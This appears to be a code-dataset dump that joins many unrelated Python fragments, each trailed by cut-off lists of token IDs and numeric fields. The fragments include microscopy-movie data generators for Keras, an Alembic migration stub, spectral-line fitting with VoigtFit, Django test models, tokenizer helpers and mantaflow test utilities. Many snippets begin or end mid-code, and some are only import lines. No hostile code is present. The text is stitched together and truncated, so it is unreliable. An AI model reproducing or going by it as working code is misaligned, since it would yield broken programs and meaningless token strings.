                self.raw_data.shape[1],
                self.raw_data.shape[2],
                self.pre_post_frame * 2,
            ],
            dtype="float32",
        )
        output_full = np.zeros(
            [1, self.raw_data.shape[1], self.raw_data.shape[2], 1], dtype="float32"
        )

        # Neighboring frames, excluding the target and the omission window.
        input_index = np.arange(
            index_frame - self.pre_post_frame - self.pre_post_omission,
            index_frame + self.pre_post_frame + self.pre_post_omission + 1,
        )
        input_index = input_index[input_index != index_frame]

        for index_padding in np.arange(self.pre_post_omission + 1):
            input_index = input_index[input_index != index_frame - index_padding]
            input_index = input_index[input_index != index_frame + index_padding]

        data_img_input = self.raw_data[input_index, :, :]
        data_img_output = self.raw_data[index_frame, :, :]

        # Reorder (frame, y, x) -> (y, x, frame) so frames become channels.
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        # z-score with the statistics computed in __init__.
        data_img_input = (
            data_img_input.astype("float32") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float32") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        return input_full, output_full
class OphysGenerator(DeepGenerator):
    "Generates data for Keras"
    # Serves 512x512 movie frames from an HDF5 file, optionally read
    # directly from S3.
    # NOTE(review): __getitem__ is not visible in this chunk -- presumably
    # provided by DeepGenerator or stripped from this view; verify.

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        if "from_s3" in self.json_data.keys():
            self.from_s3 = self.json_data["from_s3"]
        else:
            self.from_s3 = False

        self.raw_data_file = self.json_data["movie_path"]
        self.batch_size = self.json_data["batch_size"]
        # Frames taken before/after the target as input channels.
        self.pre_frame = self.json_data["pre_frame"]
        self.post_frame = self.json_data["post_frame"]
        self.start_frame = self.json_data["start_frame"]

        # This is compatible with negative frames
        self.end_frame = self.json_data["end_frame"]

        # This is used to limit the total number of samples
        # -1 means to take all and is the default fall back
        if "total_samples" in self.json_data.keys():
            self.total_samples = self.json_data["total_samples"]
        else:
            self.total_samples = -1

        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            raw_data = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')['data']
        else:
            raw_data = h5py.File(self.raw_data_file, "r")["data"]

        self.total_frame_per_movie = int(raw_data.shape[0])

        if self.end_frame < 0:
            # Negative end_frame counts back from the end of the movie.
            self.img_per_movie = (
                self.total_frame_per_movie
                + 1
                + self.end_frame
                - self.start_frame
                - self.post_frame
            )
        elif self.total_frame_per_movie < self.end_frame:
            # end_frame beyond the movie: clamp to what is available.
            self.img_per_movie = (
                self.total_frame_per_movie - self.start_frame - self.post_frame
            )
        else:
            self.img_per_movie = self.end_frame + 1 - self.start_frame

        # Normalization statistics estimated from the first frames only.
        average_nb_samples = 1000

        local_data = raw_data[0:average_nb_samples, :, :].flatten()
        local_data = local_data.astype("float32")
        self.local_mean = np.mean(local_data)
        self.local_std = np.std(local_data)

        self.list_samples = np.arange(
            self.start_frame, self.start_frame + self.img_per_movie
        )

        if "randomize" in self.json_data.keys():
            self.randomize = self.json_data["randomize"]
        else:
            self.randomize = 1
        if self.randomize:
            np.random.shuffle(self.list_samples)

        # We cut the number of samples if asked to
        if self.total_samples>0 and self.total_samples<len(self.list_samples):
            self.list_samples = self.list_samples[0:self.total_samples]

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.floor(float(len(self.list_samples)) / self.batch_size))

    def __data_generation__(self, index_frame):
        "Generates data containing batch_size samples"
        # The file is reopened for every sample -- presumably to keep the
        # generator safe across worker processes; TODO confirm.
        if self.from_s3:
            s3_filesystem = s3fs.S3FileSystem()
            movie_obj = h5py.File(s3_filesystem.open(self.raw_data_file,'rb'),'r')
        else:
            movie_obj = h5py.File(self.raw_data_file, "r")

        input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
        output_full = np.zeros([1, 512, 512, 1])

        # Neighboring frames around the target, excluding the target itself.
        input_index = np.arange(
            index_frame - self.pre_frame, index_frame + self.post_frame + 1,
        )
        input_index = input_index[input_index != index_frame]

        data_img_input = movie_obj["data"][input_index, :, :]
        data_img_output = movie_obj["data"][index_frame, :, :]

        # Reorder (frame, y, x) -> (y, x, frame) so frames become channels.
        data_img_input = np.swapaxes(data_img_input, 1, 2)
        data_img_input = np.swapaxes(data_img_input, 0, 2)

        img_in_shape = data_img_input.shape
        img_out_shape = data_img_output.shape

        # z-score with the statistics computed in __init__.
        data_img_input = (
            data_img_input.astype("float") - self.local_mean
        ) / self.local_std
        data_img_output = (
            data_img_output.astype("float") - self.local_mean
        ) / self.local_std

        input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
        output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

        movie_obj.close()

        return input_full, output_full
class MovieJSONGenerator(DeepGenerator):
    """Generates data for Keras.

    Serves (input, output) frame pairs from a collection of movies described
    in a JSON index file: the output is one movie frame and the input is its
    pre/post neighbors (the frame itself excluded), both z-scored with the
    per-movie mean/std stored in the index.
    NOTE(review): get_lims_id_sample_from_index is not visible in this
    chunk -- presumably defined on DeepGenerator or stripped; verify.
    """

    def __init__(self, json_path):
        "Initialization"
        super().__init__(json_path)

        self.sample_data_path_json = self.json_data["train_path"]
        self.batch_size = self.json_data["batch_size"]
        self.steps_per_epoch = self.json_data["steps_per_epoch"]
        self.epoch_index = 0

        # The following is to be backward compatible with configs that only
        # define a symmetric "pre_post_frame".
        if "pre_frame" in self.json_data.keys():
            self.pre_frame = self.json_data["pre_frame"]
        else:
            self.pre_frame = self.json_data["pre_post_frame"]
        if "post_frame" in self.json_data.keys():
            self.post_frame = self.json_data["post_frame"]
        else:
            self.post_frame = self.json_data["pre_post_frame"]

        with open(self.sample_data_path_json, "r") as json_handle:
            self.frame_data_location = json.load(json_handle)

        self.lims_id = list(self.frame_data_location.keys())
        self.nb_lims = len(self.lims_id)
        # Assumes every movie lists the same number of frames as the first
        # one -- TODO confirm against the index files in use.
        self.img_per_movie = len(self.frame_data_location[self.lims_id[0]]["frames"])

    def __len__(self):
        "Denotes the total number of batches"
        return int(np.ceil(float(self.nb_lims * self.img_per_movie) / self.batch_size))

    def __data_generation__(self, index_frame):
        # X : (n_samples, *dim, n_channels)
        "Generates data containing batch_size samples"
        try:
            # Map the flat sample index onto (movie id, frame slot).
            local_lims, local_img = self.get_lims_id_sample_from_index(index_frame)

            # Locate the motion-corrected movie on disk, preferring a real
            # file over a symbolic link.
            local_path = self.frame_data_location[local_lims]["path"]
            _filenames = ["motion_corrected_video.h5", "concat_31Hz_0.h5"]
            motion_path = []
            for _filename in _filenames:
                _filepath = os.path.join(local_path, "processed", _filename)
                if os.path.exists(_filepath) and not os.path.islink(
                    _filepath
                ):  # Path exists and is not symbolic
                    motion_path = _filepath
                    break

            output_frame = self.frame_data_location[local_lims]["frames"][local_img]
            local_mean = self.frame_data_location[local_lims]["mean"]
            local_std = self.frame_data_location[local_lims]["std"]

            input_full = np.zeros([1, 512, 512, self.pre_frame + self.post_frame])
            output_full = np.zeros([1, 512, 512, 1])

            # Neighboring frames around the target, excluding the target.
            input_index = np.arange(
                output_frame - self.pre_frame, output_frame + self.post_frame + 1,
            )
            input_index = input_index[input_index != output_frame]

            # BUG FIX: use a context manager so the HDF5 handle is released
            # even when slicing raises (the original closed it manually and
            # leaked the handle on error).
            with h5py.File(motion_path, "r") as movie_obj:
                data_img_input = movie_obj["data"][input_index, :, :]
                data_img_output = movie_obj["data"][output_frame, :, :]

            # Reorder (frame, y, x) -> (y, x, frame): frames -> channels.
            data_img_input = np.swapaxes(data_img_input, 1, 2)
            data_img_input = np.swapaxes(data_img_input, 0, 2)

            img_in_shape = data_img_input.shape
            img_out_shape = data_img_output.shape

            # z-score with the per-movie statistics from the JSON index.
            data_img_input = (data_img_input.astype("float") - local_mean) / local_std
            data_img_output = (data_img_output.astype("float") - local_mean) / local_std

            input_full[0, : img_in_shape[0], : img_in_shape[1], :] = data_img_input
            output_full[0, : img_out_shape[0], : img_out_shape[1], 0] = data_img_output

            return input_full, output_full
        except Exception:
            # BUG FIX: the original bare `except:` printed the undefined name
            # `output_frame_index`, so every failure surfaced as a NameError
            # that masked the real exception (and the bare clause also caught
            # KeyboardInterrupt/SystemExit). Report the index we do have and
            # propagate the original error.
            print("Issues with " + str(self.lims_id) + " at sample index " + str(index_frame))
            raise
| [
2,
5016,
284,
7716,
1366,
329,
3047,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33918,
198,
11748,
289,
20,
9078,
198,
11748,
28686,
198,
11748,
11192,
273,
11125,
13,
6122,
292,
355,
41927,
292,
198,
6738,
2769,
3849,
16104,
341,
... | 2.125052 | 9,540 |
"""empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
| [
37811,
28920,
3275,
198,
198,
18009,
1166,
4522,
25,
275,
43193,
65,
34427,
67,
15,
276,
198,
18009,
2696,
25,
269,
47941,
2713,
5824,
65,
2481,
68,
198,
16447,
7536,
25,
2177,
12,
3312,
12,
1828,
1105,
25,
3559,
25,
3510,
13,
20964... | 2.5 | 104 |
#!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
32039,
25,
32900,
329,
2734,
2655,
64,
5016,
8554,
11361,
284,
8798,
5313,
6060,
13,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4149,
82,
832,
257,
2393,
11,
32139,
31... | 2.384615 | 169 |
import random
from Items import *
pygame.init()
| [
11748,
4738,
198,
6738,
17230,
1330,
1635,
198,
198,
9078,
6057,
13,
15003,
3419,
628,
628
] | 3.25 | 16 |
from collections import Counter
from utils import flatten_lists
| [
6738,
17268,
1330,
15034,
201,
198,
6738,
3384,
4487,
1330,
27172,
268,
62,
20713,
201
] | 4.333333 | 15 |
import astropy.io.fits as pyfits
| [
11748,
6468,
28338,
13,
952,
13,
21013,
355,
12972,
21013,
628
] | 3.090909 | 11 |
from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
| [
6738,
2746,
13,
21812,
1330,
13051,
21575,
198,
6738,
2746,
13,
6057,
62,
19849,
1330,
13051,
8777,
17633,
198,
6738,
2746,
13,
6057,
62,
15252,
1330,
3776,
10267,
628,
198
] | 4.066667 | 30 |
import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| [
11748,
299,
32152,
355,
45941,
198,
11748,
20687,
328,
83,
31805,
198,
198,
21017,
25048,
360,
13534,
3371,
627,
42391,
1195,
1485,
1485,
10,
1415,
3901,
198,
21017,
11086,
8520,
287,
1395,
12,
1477,
25141,
350,
49352,
13,
32,
12,
405,
... | 2.583433 | 1,666 |
import os
import cv2
import face_detector
import config
if __name__ == '__main__':
camera = cv2.VideoCapture(0)
cv2.namedWindow("preview")
person_name = input('Person name: ').lower()
person_folder = os.path.join(config.original_images_path, person_name)
if not os.path.exists(person_folder):
os.mkdir(person_folder)
counter = 0
timer = 0
while counter < config.number_of_faces and camera.isOpened():
ret, frame = camera.read()
faces = face_detector.detect_faces_dlib(frame)
if len(faces):
face = faces[0]
if timer % 200 == 50:
cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
counter += 1
face_detector.draw_text(frame, face, str(counter))
face_detector.draw_rectangle(frame, face)
cv2.imshow('Camera image', frame)
if cv2.waitKey(20) & 0xFF == 27:
break
timer += 50
camera.release()
cv2.destroyAllWindows() | [
11748,
28686,
198,
11748,
269,
85,
17,
198,
11748,
1986,
62,
15255,
9250,
198,
11748,
4566,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
4676,
796,
269,
85,
17,
13,
10798,
49630,
7,
15,
8,
... | 2.052336 | 535 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def clause_tokenize(sentence):
"""Split on comma or parenthesis, if there are more then three words for each clause"""
clause_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
clause_stem = clause_re.sub(r'\1###clausebreak###', sentence)
return [c for c in clause_stem.split('###clausebreak###') if c!='']
def word_tokenize(sentence):
"""Cut the sentence in into tokens without deleting anything"""
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']
escape_re = re.compile("|".join(number_pattern + arr_pattern))
escapes = escape_re.findall(sentence)
escaped_stem = escape_re.sub('protectprotectprotect', sentence)
word_stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', escaped_stem)
escaped_word_stem = word_stem.replace('{','{{').replace('}', '}}')
result = escaped_word_stem.replace('protectprotectprotect', '{}').format(*escapes)
return [r.strip() for r in result.split(' ') if r != '']
def slim_stem(token):
"""A very simple stemmer, for entity of GO stemming"""
target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
for subfix in sorted(target_subfixs, key=len, reverse=True):
idx = token.find(subfix)
if idx != -1 and idx == len(token)-len(subfix):
return token[0:-len(subfix)]
return token
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
def ngram(n, iter_tokens):
"""Return a generator of n-gram from an iterable"""
z = len(iter_tokens)
return (iter_tokens[i:i+n] for i in xrange(z-n+1))
def power_ngram(iter_tokens):
"""Generate unigram, bigram, trigram ... and the max-gram,
different from powerset(), this function will not generate skipped combinations such as (1,3)"""
return chain.from_iterable(ngram(j, iter_tokens) for j in xrange(1, len(iter_tokens)))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
1279,
46803,
18982,
29,
18,
13,
15,
3556,
46803,
18982,
29,
198,
198,
2,
1279,
8189,
3846,
29,
198,
198,
11748,
302,
198,
6738,
340,
861,
10141,
1330,
6333,
11,
1... | 2.389126 | 938 |
from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
| [
6738,
279,
420,
13,
37724,
13,
32,
2821,
2257,
1330,
47105,
2257,
198,
6738,
279,
420,
13,
37724,
13,
32,
2821,
13940,
23650,
10962,
1330,
47105,
13940,
23650,
10962,
628,
198
] | 2.967742 | 31 |
from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
# BFS (Accepted), O(n) time, O(n) space
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| [
6738,
17268,
1330,
390,
4188,
198,
198,
2,
30396,
329,
257,
13934,
5509,
10139,
13,
198,
2,
1398,
12200,
19667,
25,
198,
2,
220,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
1188,
28,
15,
11,
1364,
28,
14202,
11,
826,
28,
... | 2.011928 | 503 |
import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
""" Base for all the test models """
id = UUIDField(default=uuid.uuid4, primary_key=True)
created_at = DateTimeField(auto_now_add=True)
updated_at = DateTimeField(auto_now=True)
class OrdinaryBaseTest(TestBase):
""" Ordinary base test. Has a random char field."""
random = CharField(max_length=255, null=True)
random2 = CharField(max_length=255, null=True)
class OrdinaryTest(OrdinaryBaseTest):
""" Ordinary test. Has a random char field."""
class M2MTest(TestBase):
""" Used to test the Many-To-Many Relationship functionality of DAL"""
relationship = ManyToManyField(OrdinaryTest)
class ForeignKeyTest(TestBase):
""" Used to test ForeignKey functionality of DAL."""
relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
class OneToOneTest(TestBase):
""" Used to test the One-To-One Relationship functionality of DAL."""
relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
class SpeedTest(TestBase):
""" Used to test the speed of DAL """
for idx in range(100):
exec(f"column{idx} = CharField(max_length=15, null=True)")
class FullClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test the full model exclusion via meta class"""
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial ignore via fields """
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test full decorator exclusion """
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial decorator exclusion """
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
"""
Used to check if include_model
has precedence over class based configuration
"""
| [
11748,
334,
27112,
198,
6738,
42625,
14208,
13,
9945,
13,
27530,
1330,
357,
198,
220,
220,
220,
9104,
11,
198,
220,
220,
220,
471,
27586,
15878,
11,
198,
220,
220,
220,
7536,
7575,
15878,
11,
198,
220,
220,
220,
4650,
2514,
7085,
15... | 3.046043 | 695 |
version = "__VERSION__"
| [
9641,
796,
366,
834,
43717,
834,
1,
198
] | 3 | 8 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
col_names = com_col_names
header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
26223,
2447,
2681,
838,
25,
2816,
25,
2919,
12131,
198,
198,
31,
9800,
25,
290,
4364,
750... | 3.015759 | 698 |
from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| [
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
198,
6738,
764,
1330,
4981,
198,
198,
28482,
13,
15654,
13,
30238,
7,
27530,
13,
32,
4949,
8,
198,
28482,
13,
15654,
13,
30238,
7,
27530,
13,
35048,
41690,
8,
198,
28482,
13,
1565... | 3.060403 | 149 |
"""LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
| [
37811,
25835,
23264,
7822,
286,
3049,
23264,
37227,
198,
11748,
4818,
21156,
355,
288,
83,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
1341,
35720,
13,
3866,
36948,
1330,
36052,
27195,
12342,
198,
6738,
289,
17,
12162,
291,
382,
13,
... | 3.414815 | 135 |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
| [
198,
11748,
11454,
3919,
198,
11748,
33918,
198,
11748,
18931,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
11748,
334,
27112,
198,
11748,
19974,
7753,
198,
11748,
302,
198,
11748,
850,
14681,
198,
198,
11748,
19798,
292,
355,
279,
67,
... | 3.402174 | 92 |
import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
"""Uma classe que representa uma unica estrela"""
def __init__(self, tela, janela):
"""Inicializa a estrela e define sua posicao inicial."""
super(Estrela, self).__init__()
self.janela = janela
self.tela = tela
# Carrega a imagem do alienigena e define seu atributo rect
self.imagem = pygame.image.load('emoji.png')
self.imagem = pygame.transform.scale(self.imagem, [15, 15])
self.rect = pygame.Rect(0, 0, 0, 0)
# Inica cada novo estrela a parte superios da tela
# Armazena a posicao exata da estrela
self.x = float(self.rect.x)
def desenha_estrela(self):
"""Desenha a estrela em sua posicao actual"""
if self.janela[0] > self.rect.x:
self.rect.x += 30
self.tela.blit(self.imagem, self.rect)
print('desenhei x')
elif self.janela[1] > self.rect.y:
self.rect.x = 0
self.rect.y += 30
inicia_jogo() | [
11748,
12972,
6057,
198,
6738,
12972,
6057,
13,
34975,
578,
1330,
33132,
198,
11748,
25064,
198,
198,
4871,
10062,
2411,
64,
7,
38454,
578,
2599,
198,
220,
220,
220,
37227,
52,
2611,
537,
21612,
8358,
2380,
64,
334,
2611,
555,
3970,
1... | 2.075581 | 516 |
#
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
# reset and generate info file with version string when in data gen mode
# read test data
# try to load uni file if it exists
# configure input filenames
# try to load uni file if it exists
| [
2,
198,
2,
5053,
525,
5499,
329,
1332,
4539,
287,
24818,
1878,
9319,
198,
2,
220,
198,
198,
6738,
285,
4910,
1330,
1635,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
11748,
302,
198,
6738,
31904,
46189,
1330,
1635,
628,
198,
2,
16... | 4.137821 | 312 |
from gym.envs.registration import register
register(
id='recon-arena-v0',
entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| [
6738,
11550,
13,
268,
14259,
13,
2301,
33397,
1330,
7881,
198,
198,
30238,
7,
198,
220,
220,
220,
4686,
11639,
260,
1102,
12,
533,
2616,
12,
85,
15,
3256,
198,
220,
220,
220,
5726,
62,
4122,
11639,
1360,
76,
62,
3876,
75,
62,
260,... | 2.375 | 64 |
"""
Aliyun ECS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| [
37811,
198,
2348,
7745,
403,
412,
7902,
198,
2559,
855,
198,
198,
464,
1708,
18538,
7824,
4028,
389,
3016,
3938,
4855,
25,
628,
220,
220,
220,
1635,
3060,
43961,
23739,
198,
220,
220,
220,
1635,
23520,
43961,
23739,
198,
220,
220,
220... | 3.235294 | 51 |
import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
| [
11748,
25064,
198,
11748,
18931,
198,
198,
6738,
1908,
563,
62,
21282,
74,
1330,
3384,
4487,
198,
6738,
1908,
563,
62,
21282,
74,
13,
40140,
1330,
14699,
198,
6738,
1908,
563,
62,
21282,
74,
13,
26791,
1330,
49706,
198,
6738,
1908,
56... | 3.269841 | 63 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
